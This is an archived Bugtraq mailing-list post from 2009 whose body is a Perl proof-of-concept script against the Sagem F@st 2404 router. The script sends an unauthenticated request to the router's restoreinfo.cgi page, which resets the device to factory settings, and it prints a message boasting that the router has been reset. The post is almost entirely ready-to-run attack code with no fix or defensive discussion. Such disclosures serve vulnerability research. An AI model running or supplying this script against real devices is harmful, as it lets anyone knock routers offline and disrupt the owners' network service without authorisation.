lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20090116210256.23031.qmail@securityfocus.com>
Date: 16 Jan 2009 21:02:56 -0000
From: alphanix00@...il.com
To: bugtraq@...urityfocus.com
Subject: Sagem router f@st 2404 remote reset poc

#!/usr/bin/perl
# By ALpHaNiX
# NullArea.Net
# THanks

use HTTP::Request;
use HTTP::Headers;
use LWP::UserAgent;

if (@ARGV != 1) { &help; exit(); }
if ($ARGV[0] =~ /http:\/\// ) { $ip = $ARGV[0]."/"; } else { $ip = "http://".$ARGV[0]."/"; }
print "[+] Working on it\n\n";

sub help(){
    print "[X] Usage : ./exploit.pl 127.0.0.1 \n";
}

$restore = "restoreinfo.cgi" ;
$target = $ip.$restore ;
my $request   = HTTP::Request->new(GET=>$target);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response  = $useragent->request($request);
print "[+] Note : No Auth Needed For this operation !\n" ;
print "[+] Exploited , This Rooter $ip Have been reseted !" ;

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ